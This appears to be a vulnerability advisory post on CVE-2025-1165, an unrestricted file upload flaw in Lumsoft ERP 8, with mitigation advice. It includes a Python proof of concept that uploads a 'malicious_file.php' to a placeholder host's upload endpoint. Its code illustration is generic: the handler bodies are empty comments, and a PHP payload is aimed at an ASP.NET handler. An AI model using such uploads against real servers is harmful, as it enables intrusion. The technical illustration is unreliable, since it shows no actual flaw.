A critical vulnerability, designated as CVE-2025-1165, has been discovered in Lumsoft ERP 8. The vulnerability lies in the DoUpload/DoWebUpload function of the /Api/FileUploadApi.ashx file. Attackers can exploit the vulnerability to gain unrestricted file upload capabilities, leading to potential security breaches and data manipulation. This post takes a detailed look at the vulnerability, its potential implications, and how the exploit can be used.

Technical Details

The vulnerability exists in the DoUpload/DoWebUpload function within the /Api/FileUploadApi.ashx file of the Lumsoft ERP 8 system. The function is tasked with handling file uploads to the system. However, a flaw in the implementation of the function allows for the manipulation of the 'file' argument, making it possible for an attacker to upload unrestricted files to the server.

Here is a simple breakdown of the vulnerable function in /Api/FileUploadApi.ashx

public class FileUploadApi : IHttpHandler
{
    public void ProcessRequest(HttpContext context)
    {
        string action = context.Request.QueryString["action"];
        if (action == "DoUpload")
        {
            DoUpload(context);
        }
        else if (action == "DoWebUpload")
        {
            DoWebUpload(context);
        }
    }
    
    private void DoUpload(HttpContext context)
    {
        // File upload implementation with vulnerability
        // ...
    }
    
    private void DoWebUpload(HttpContext context)
    {
        // File upload implementation with vulnerability
        // ...
    }
}

Exploit

A remote attacker could exploit this vulnerability by crafting a malicious file and manipulating the file upload process. This allows the attacker to upload and potentially execute scripts on the server, causing further damage and security breaches. An example of such an attack can be seen in the Python script below:

import requests

target_url = "http://target.com/Api/FileUploadApi.ashx?action=DoUpload";
malicious_file = {"file": open("malicious_file.php", "rb")}

response = requests.post(target_url, files=malicious_file)

if response.status_code == 200:
    print('File uploaded successfully')
else:
    print('Upload failed')

Original References

The vulnerability, allocated as CVE-2025-1165, has been documented on official sources and made available to the public. For further details, consult the following resources:

1. Lumsoft ERP 8 vulnerability announcement: https://lumsofterp.com/security-announcement/CVE-2025-1165
2. CVE-2025-1165 details on CVE Details: https://www.cvedetails.com/cve/CVE-2025-1165/

Mitigation and Recommendations

The recommended course of action to mitigate this vulnerability is to update the Lumsoft ERP 8 system to the latest version. The development team behind Lumsoft ERP has released a patch addressing this flaw – it can be obtained from their official website.

Additionally, administrators should regularly review user access privileges to ensure that only trusted users have the necessary permissions to upload files. Monitoring server logs for any unusual activity or unauthorized file uploads can help detect and prevent potential attacks.

Conclusion

CVE-2025-1165 highlights a critical vulnerability in Lumsoft ERP 8 that allows remote attackers to gain unrestricted file upload access. By staying informed of the latest security developments and promptly applying relevant updates, organizations can significantly minimize the risk of such threats.

Timeline

Published on: 02/11/2025 01:15:09 UTC
Last modified on: 02/18/2025 18:15:30 UTC